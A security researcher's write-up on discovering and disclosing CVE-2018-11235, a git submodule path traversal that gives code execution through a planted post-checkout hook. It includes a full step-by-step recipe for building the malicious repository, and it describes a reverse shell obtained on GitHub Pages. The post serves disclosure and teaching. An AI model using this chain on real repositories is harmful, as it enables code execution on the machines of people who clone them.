Recently I was working on a git repository that contained numerous submodules. At this point I realised that I did not know how submodules worked and decided to dive into the submodule system to gain a better understanding. During this process of discovery I came across a vulnerability in the submodule system, which led to Remote Code Execution (RCE) in git when a submodule was initialised. This allowed for reliable exploitation of any host that cloned my malicious repository, and ultimately gave me RCE in GitHub Pages and CVE-2018-11235 for git.

What follows are the steps that led to the discovery of the vulnerability and how to exploit it. This is probably one of my favourite bugs that I’ve found. Simple on the face of it, but I had to work, and needed some luck, to achieve code execution.

Submodule Basics

Git allows you to include external repositories in your repository, so you can easily pull in external dependencies and automatically track changes to them. From git-scm:

A submodule is a repository embedded inside another repository. The submodule has its own history; the repository it is embedded in is called a superproject.

If you want the full low-down on submodules, these resources could be useful:

To understand how submodules work, let’s add a basic submodule and see what changes are made to our repository. To add a submodule to your repository you simply use the git submodule add command. This takes care of cloning the external repository and setting up a few configuration options for you. Each submodule has a name and a path. The path is used to track the submodule and this is also where in your repository the submodule will be stored.

If we add an external submodule with

git submodule add https://github.com/staaldraad/repository.git mysubmodule

the following files will be created:

  • mysubmodule/ - this is the path relative to your repository into which the submodule will be cloned
  • .gitmodules - this file will be created if it doesn’t exist, and will contain the basic init information about your submodule[s]
  • $GIT_DIR/modules/mysubmodule - this folder contains the git directory for the submodule (this is the same as the .git directory you already know)
  • $GIT_DIR/config - the .git/config file gets modified to contain a reference to all our submodules

Once the submodule has been added to the repository and you push the changes to your remote, you might notice that the contents of the submodule aren’t actually added to the remote. The .gitmodules file contains the information about our submodule[s] and will be used to initialise the submodules in any clones of our repository.

Submodule in a repo


To have the submodule[s] get initialised in your local clone of the repository, you would either need to specify this during the clone with:

git clone --recurse-submodules https://github.com/staaldraad/repository.git

Or you can do it in an existing repository with:

git submodule update --init

The .gitmodules file plays an important role in submodules, and is something under our control. Inspecting the .gitmodules file you’ll see the following:

[submodule "mysubmodule"]
        path = mysubmodule
        url = https://github.com/staaldraad/repository.git

And this is where I noticed something that triggered the “spidey senses” and the search for a vulnerability started.

Vulnerability Discovery

Looking at the .gitmodules file you might notice that mysubmodule occurs twice, once in the submodule name and once in our path. By default the submodule name is the same as the submodule path, unless a name is specified with the --name argument. What you might also notice is that the submodule name is used to create the .git directory for the submodule. The path for this directory ended up being $GIT_DIR/modules/mysubmodule. This got me wondering: what if the submodule name is a path? To see if I could manipulate the file path used, I modified the submodule name in the .gitmodules file.

The modified .gitmodules:

[submodule "../../submodule"]
        path = mysubmodule
        url = https://github.com/staaldraad/repository.git

I committed the changes and went through the process of cloning the repository. The change to the submodule name resulted in the submodule repository being created in the main repository instead of in .git/modules where it belongs.

git clone --recurse-submodules https://github.com/staaldraad/repository.git
<snip>...</snip>

cd repository

ls -l 
drwxrwxr-x. 2 staaldraad staaldraad    40 May  3 13:26 submodule
-rw-rw-r--. 1 staaldraad staaldraad     3 May  3 13:26 README.md
drwxrwxr-x. 2 staaldraad staaldraad    40 May  3 13:26 mysubmodule

ls -l submodule                                                                                                             
total 28
drwxrwxr-x. 2 staaldraad staaldraad    40 May  3 13:26 branches
-rw-rw-r--. 1 staaldraad staaldraad   293 May  3 13:26 config
-rw-rw-r--. 1 staaldraad staaldraad    73 May  3 13:26 description
-rw-rw-r--. 1 staaldraad staaldraad    41 May  3 13:26 HEAD
drwxrwxr-x. 2 staaldraad staaldraad   240 May  3 13:26 hooks
-rw-rw-r--. 1 staaldraad staaldraad 11120 May  3 13:26 index
drwxrwxr-x. 2 staaldraad staaldraad    60 May  3 13:26 info
drwxrwxr-x. 3 staaldraad staaldraad    80 May  3 13:26 logs
drwxrwxr-x. 4 staaldraad staaldraad    80 May  3 13:26 objects
-rw-rw-r--. 1 staaldraad staaldraad   107 May  3 13:26 packed-refs
drwxrwxr-x. 5 staaldraad staaldraad   100 May  3 13:26 refs
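
The listing above is what you would expect if the submodule name is simply appended to $GIT_DIR/modules/ with no validation. A minimal sketch of that path arithmetic in plain shell follows. The helpers normalize_path and module_git_dir are hypothetical names for illustration, the /tmp/repository location is an assumption, and this models the observed behaviour rather than git's actual code.

```shell
# Hypothetical helper: lexically collapse "." and ".." in an absolute path,
# without touching the filesystem.
normalize_path() {
    path=$1
    result=
    old_ifs=$IFS
    IFS=/
    set -f                      # no globbing while we split on "/"
    for part in $path; do
        case $part in
            ''|.) ;;                            # skip empty and "." components
            ..)   result=${result%/*} ;;        # drop the last component
            *)    result=$result/$part ;;
        esac
    done
    set +f
    IFS=$old_ifs
    printf '%s\n' "${result:-/}"
}

# Hypothetical model of where a submodule's git directory ends up:
# <gitdir>/modules/<name>, with the name taken verbatim from .gitmodules.
module_git_dir() {
    normalize_path "$1/modules/$2"
}

module_git_dir /tmp/repository/.git mysubmodule
# -> /tmp/repository/.git/modules/mysubmodule
module_git_dir /tmp/repository/.git ../../submodule
# -> /tmp/repository/submodule
```

Two levels of ".." are exactly enough to climb out of .git/modules and land in the work-tree, which matches the submodule directory showing up next to README.md.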

Turns out there is a directory traversal in the submodule cloning function and we can now write to an arbitrary location, but unfortunately we don’t control the data. Everything that is created comes from git, and besides, what use is a git repository when we want to get code execution? At this point I went down a small rabbit hole of trying to write to different locations using symlinks; however, all this got me was the ability to overwrite existing folders (annoying and destructive, but not really all that useful).

I took a step back, decided to worry less about fully controlling the contents being written, and looked instead at git itself and how you could execute code from git. That reminded me of git hooks.

git hooks

Git hooks are divided into client-side and server-side hooks. These hooks are simply executable scripts (bash, etc.) that are triggered when predefined events happen in the git workflow. A common example of this is a pre-commit hook that verifies no sensitive data is being included in the commit. These hooks seem like a promising avenue for code execution, but unfortunately hooks are located in $GIT_DIR/hooks/, meaning they are never included in your git repository stored on a remote, and aren’t part of what gets cloned when you do a git clone. This is for good reason: if hooks were in the actual git work-tree, I could easily create a repository with a malicious client-side hook and anyone cloning that repository would end up executing the hook. Not ideal.
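
To make this concrete, here is a small sketch showing that a hook lives in $GIT_DIR/hooks, fires on checkout, and cannot be staged along with the rest of the repository. The temporary directory, the branch name other and the marker file hook-ran.txt are all assumptions for illustration; it needs a local git but no network access.

```shell
# Throwaway repository in a temporary directory (remove "$demo" when done).
demo=$(mktemp -d)
git init -q "$demo"
mkdir -p "$demo/.git/hooks"     # present by default, but cheap to make sure

# A client-side hook: git runs it from the root of the work-tree after a checkout.
cat > "$demo/.git/hooks/post-checkout" <<'EOF'
#!/bin/sh
echo "hook ran" > hook-ran.txt
EOF
chmod +x "$demo/.git/hooks/post-checkout"

# Create a commit so there is something to check out, then switch branches.
git -C "$demo" -c user.name=demo -c user.email=demo@example.com \
    commit -q --allow-empty -m "initial commit"
git -C "$demo" checkout -q -b other

# Stage everything git is willing to track and list it.
git -C "$demo" add -A
git -C "$demo" ls-files
```

The only path listed should be the marker file the hook wrote; the hook script itself sits inside .git and is never part of what gets committed or cloned.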

Submodules can also have hooks, since a submodule is simply an external git repository, and these are stored in $GIT_DIR/modules/modulename/hooks. This gave me an idea: what if we use our submodule directory traversal to create/trigger a hook outside of the $GIT_DIR?

Back to traversal

Since the traversal allows our submodule repository to be outside of the $GIT_DIR we can add it to our work-tree and commit this to our remote. This means it would be included in any git clone and in theory the hook should trigger when any changes are made to the submodule.

At this point I did the following:

Add a submodule:

git submodule add https://github.com/staaldraad/repository.git submod

Create a “fakegit” directory to use for our traversal:

mkdir -p fakegit/modules

Move the folder out of $GIT_DIR/modules and into the main repository (for traversal):

mv .git/modules/submod fakegit/modules

Create a git hook

vim fakegit/modules/submod/hooks/post-checkout
chmod +x !$

Modify .gitmodules to contain the traversal (new module name: ../../fakegit/modules/submod)

Push everything to the remote:

git add .
git commit -m "msg"
git push origin master

The idea being that when the repository gets cloned, fakegit/modules/submod would appear to be a valid submodule repository, and when the subsequent git submodule update --init is run, git would use fakegit/modules/submod instead of $GIT_DIR/modules/submod due to our traversal. Since this contains a hook, the hook should be executed once the checkout completes.

Great in theory, but in practice it fails.

Submodule '../../fakegit/modules/submod' (https://github.com/staaldraad/repository.git) registered for path 'submod'
Cloning into '/tmp/c/v/subs/submod'...
fatal: /tmp/c/v/subs/.git/modules/../../fakegit/modules/submod already exists
fatal: clone of 'https://github.com/staaldraad/repository.git' into submodule path '/tmp/c/v/subs/submod' failed
Failed to clone 'submod'. Retry scheduled
Cloning into '/tmp/c/v/subs/submod'...
remote: Counting objects: 274, done.        
remote: Compressing objects: 100% (227/227), done.        
remote: Total 274 (delta 14), reused 268 (delta 8), pack-reused 0        
Receiving objects: 100% (274/274), 44.03 KiB | 392.00 KiB/s, done.
Resolving deltas: 100% (14/14), done.
Submodule path 'submod': checked out 'cc0db68d85f7ce60a51c62bf451d7575e5a9a89e'
Submodule path 'submod': checked out 'cc0db68d85f7ce60a51c62bf451d7575e5a9a89e'

Recall I mentioned earlier that this traversal allowed me to overwrite arbitrary folders? That is exactly what happens here. Git tries to initialise the submodule repository in our fake location, but the folder already exists. It ends up deleting the contents, and then retrying. This overwrites our specially crafted attack and the hook never fires.

fatal: /tmp/c/v/subs/.git/modules/../../fakegit/modules/submod already exists
fatal: clone of 'https://github.com/staaldraad/repository.git' into submodule path '/tmp/c/v/subs/submod' failed
Failed to clone 'submod'. Retry scheduled
Cloning into '/tmp/c/v/subs/submod'...

Not willing to give up, and with the spidey senses shouting more than ever that RCE was within reach, I started playing a frustrating game of “prevent git from overwriting the hooks”. Initially I thought I would try to win a race: use one submodule to write the contents of the hooks folder before git retried the failed clone. Unfortunately I kept failing, as the overwrite happened on the second retry, so even if I was successful with writing to the folder using a second submodule, it would all get overwritten.

Getting lucky

And this is when I got lucky. While trying to win the race, I had always (without realising it) picked a “path” for the second submodule that was alphabetically after the first submodule. This meant git would always try to create the first module and fail, then add the second module, and then clone the first again. While trying different attacks, I inadvertently changed the second module’s path to be alphabetically before the first, so the second path was mod1 while the first was submod.

A small change, but it triggered a new code path, which I’m not even going to pretend I knew would happen. When one or more submodules exist in $GIT_DIR/modules, then no files get overwritten by our traversing submodule. By initialising the “second” submodule, it created the folder $GIT_DIR/modules/mod1 and suddenly fakegit/modules/submod was accepted as a valid path and no overwrite occurred. This meant the hook was still present and could now be triggered!

Exploitation

With everything learned, it was time to put together an attack chain. Exploitation requires you to create the “malicious” repository, which will be cloned by our victim.

Firstly create the repo:

mkdir badrepo
cd badrepo
git init
git remote add origin https://github.com/staaldraad/demosub.git

Create needed folders where our directory traversal will look for the submodule:

mkdir -p fakegit/modules

Add two submodules as follows – the contents of these don’t matter, they just need to be public/cloneable

git submodule add https://github.com/staaldraad/repository.git submod
git submodule add https://github.com/staaldraad/repository.git aaa

Move the git repository for our fake submodule from .git/modules/submod

mv .git/modules/submod fakegit/modules/submod

Create our hook in the fake git directory; this should be a valid shell script:

cat > fakegit/modules/submod/hooks/post-checkout <<EOF
#!/bin/sh

echo "PWNED"
ping -c 3 127.0.0.1

exit 0
EOF

chmod +x fakegit/modules/submod/hooks/post-checkout

Now add our path traversal to .gitmodules by changing "submod" to "../../fakegit/modules/submod" (a text editor works fine as well…):

sed -i '0,/submod/{s/"submod/"\.\.\/\.\.\/fakegit\/modules\/submod/}' .gitmodules

We also need to update the gitdir path in the submodule’s .git file to point to our new location. Git uses this during the construction of the working tree and would fail to create our commit if we don’t make this change (since we deleted $GIT_DIR/modules/submod when we moved it to the new fakegit location). Change gitdir: ../.git/modules/submod to gitdir: ../fakegit/modules/submod:

sed -i 's/\.git/fakegit/' submod/.git

Add, commit and push

git add .
git commit -m "woot"
git push origin master

Victim side

When the repository is cloned and --recurse-submodules is used we will now get RCE:

git clone --recurse-submodules https://github.com/staaldraad/demosub.git
RCE during clone


The same would happen in the case of git submodule update --init

git clone https://github.com/staaldraad/demosub.git
cd demosub
git submodule update --init

GitHub Pages RCE

Having a fresh RCE in git is great, but it requires the repository to be cloned in a specific way and might not be seen as “real world”. Thus I went looking for a good way to demonstrate risk. Having had GitHub on my list of “would love to get a shell on ‘x’” and having looked into GitHub Pages before (and hosting this blog on GitHub Pages), I knew that GitHub Pages allows you to have submodules in the repository used.

Testing whether this would work was really simple: a small change to the post-checkout script so that, rather than pinging localhost, it made a reverse connection to a host under my control, and then enabling GitHub Pages on the repository.

GitHub Pages RCE


Great success! A quick verification that the IP address was indeed from GitHub and I knew I now had RCE on GitHub.

I didn’t try to take the exploitation further at this point, and instead focused on getting a report out to GitHub. It was good to note the use of an unprivileged user in a Docker container, limiting the attack surface and opportunities for further compromise, and preventing access to other GitHub users’ data.

I reported the issue to GitHub and they were brilliant with the response. My report went in on a Sunday afternoon CEST (so really early Sunday morning PST), and within three hours of receiving the report the GitHub team had replicated, triaged and put in a temporary fix! The whole disclosure process was an advertisement for how a successful bug bounty program is run. The team over at GitHub assisted in getting the issue reported upstream to git-core and in getting a CVE issued.

Edge Case

When I found the vulnerability I was testing against git version 2.13.6. I asked a friend (the legend @Saif_Sherei) to test it out on his box and the exploit failed! He had git version 2.7.4 installed, which still triggered the exploit, but during the clone the worktree directory was changed to include additional ..\..\ which prevented the exploit from completing. After the vulnerability was disclosed, Tony Torralba @_atorralba replicated the vulnerability on git 2.7.4 by crafting an elegant workaround. I highly recommend you head over to his write-up, where he explains his thinking and the symlink trick to get this to work.

Other Operating Systems

It should be noted that this issue isn’t only exploitable through git for Linux, as demonstrated above, but should also be exploitable on OSX and Windows. The Microsoft Visual Studio Team Services team included a working PoC for OSX in their patch announcement.

Fix

A patch for git was released on the 29th of May 2018. The great thing is that the patch doesn’t only resolve the client-side issue, but also introduces an option to prevent git servers from passing along “evil” gitmodule objects. This isn’t enabled by default but can be toggled by switching on transfer.fsckObjects. More information is available here.
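
To illustrate the kind of check that closes this hole, here is a minimal sketch in shell. It assumes that rejecting any submodule name containing a ".." path component is enough to stop the traversal described in this post. The function names is_safe_submodule_name and scan_gitmodules are hypothetical, the .gitmodules parsing is deliberately simplistic (it ignores escaped quotes), and none of this is git's actual implementation.

```shell
# Hypothetical check: succeed only if the name has no ".." path component.
is_safe_submodule_name() {
    # Treat backslashes as separators too, so "..\..\x" is also caught.
    candidate=$(printf '%s' "$1" | tr '\\' '/')
    [ -n "$candidate" ] || return 1
    case "/$candidate/" in
        */../*) return 1 ;;     # a component that is exactly ".."
    esac
    return 0
}

# Hypothetical scanner: print every suspicious submodule name in a .gitmodules file.
scan_gitmodules() {
    # Pull the quoted name out of each [submodule "name"] header line.
    sed -n 's/^[[:space:]]*\[submodule "\(.*\)"\][[:space:]]*$/\1/p' "$1" |
    while IFS= read -r module_name; do
        is_safe_submodule_name "$module_name" ||
            printf 'unsafe submodule name: %s\n' "$module_name"
    done
}
```

Running scan_gitmodules .gitmodules inside the malicious repository built earlier would flag ../../fakegit/modules/submod, while a name such as a..b is left alone because ".." is not a whole path component there.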

The above fix has been enabled on most major hosters: GitHub, GitLab and Microsoft Visual Studio Team Services. This is highly commendable and prevents these hosting services from being abused to launch attacks. It is great to see the different organisations working together in the remediation of this issue and protecting end-users.

The following versions have the security update applied; it is recommended that you update to a non-vulnerable version:

  • v2.17.1 (latest)
  • v2.16.4
  • v2.15.2
  • v2.14.4
  • v2.13.7

Thanks to the GitHub security team for facilitating the reporting and disclosure of this issue. Thanks to the maintainers of git for the quick response and fix.

Edward Thomson has also written a great post with useful information on how to update git on various platforms and how to verify whether you are vulnerable. Definitely recommend you read his post.

The git team also created a test script for the issue, which does the exploit setup using built-in git commands and skips some unnecessary steps I went through: git test script

Further Reading / References